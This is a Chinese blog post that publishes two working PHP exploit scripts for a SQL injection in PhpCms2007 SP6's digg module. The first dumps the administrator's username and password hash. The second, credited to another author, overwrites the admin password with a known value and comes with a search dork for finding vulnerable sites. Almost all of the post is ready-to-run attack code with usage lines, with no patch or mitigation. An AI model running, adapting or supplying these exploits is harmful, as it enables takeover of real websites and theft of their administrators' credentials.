PhpCms2007 sp6 SQL injection 0day

2008-10-01 23:00:47 0 2855
这个漏洞是我8月份发现的,当时写的exp只是get管理员的账号密码;但现在这个漏洞已经被他人发现并且公布,而且有了update管理员密码的利用,因此我公布我当时写的这个exp,庆祝国庆~
<?
print_r('
--------------------------------------------------------------------------------
PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit
BY oldjun([url]www.oldjun.com[/url])
Thx for flyh4t^_^
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}

function getrand($i)
{
for($j=0;$j<=$i-1;$j++)
{
  srand((double)microtime()*1000000);
  $randname=rand(!$j ? 1: 0,9);
  $randnum.=$randname;
}
return $randnum;
}

function sendpacketii($packet)
{
global  $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}

/*get   $prefix*/
$packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("in your SQL syntax",$html))
{
$temp=explode("From ",$html);
if(isset($temp[1])){$temp2=explode("product",$temp[1]);}
if($temp2[0])
$prefix=$temp2[0];
echo "[+]prefix -> ".$prefix."\n";
}
echo "[~]exploting now,plz waiting\r\n";

$packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=".getrand(6)."/**/union/**/all/**/select%201,2,3,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20userid=1# HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi(chr(181).chr(227).chr(187).chr(247),$html))
{
echo $packet;
echo $html;
die("Exploit failed...");
}
else
{
$pattern="/<a href=\"\/(.*?)\">/si";
preg_match($pattern,$html,$pg);
$result=explode("|",$pg[1]);
print_r('
--------------------------------------------------------------------------------
[+]username -> '.$result[0].'
[+]password(md5 24λ) -> '.$result[1].'
--------------------------------------------------------------------------------
');
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{24}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($result[1])) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
对于此漏洞可以有深层次的利用,附Ryat 贴出来可以update管理员密码的EXP:
<?php
print_r('
+---------------------------------------------------------------------------+
Phpcms 2007 SP6 reset admin password exploit
by puret_t
mail: puretot at gmail dot com
team: [url]http://www.wolvez.org[/url]
dork: "Powered by Phpcms 2007"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 4) {
        print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user
host:      target server (ip/hostname)
path:      path to phpcms
user:      admin login name
Example:
php '.$argv[0].' localhost /phpcms/ admin
+---------------------------------------------------------------------------+
');
        exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];

$url = 'http://'.$host.$path.'member/member.php?username='.$user;

send();

if (strpos(file_get_contents($url), 'puret_t') !== false)
        exit("Expoilt Success!\nAdmin New Password:\t123456\n");
else
        exit("Exploit Failed!\n");

function send()
{
        global $host, $path, $user;

        $cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1
WHERE username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6';

        $message = "POST ".$path."digg/digg_add.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ".time()."\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;

        $fp = fsockopen($host, 80);
        fputs($fp, $message);

        $resp = '';

        while ($fp && !feof($fp))
                $resp .= fread($fp, 1024);

        return $resp;
}
?>

关于作者

oldjun132篇文章575篇回复

评论0次

要评论?请先  登录  或  注册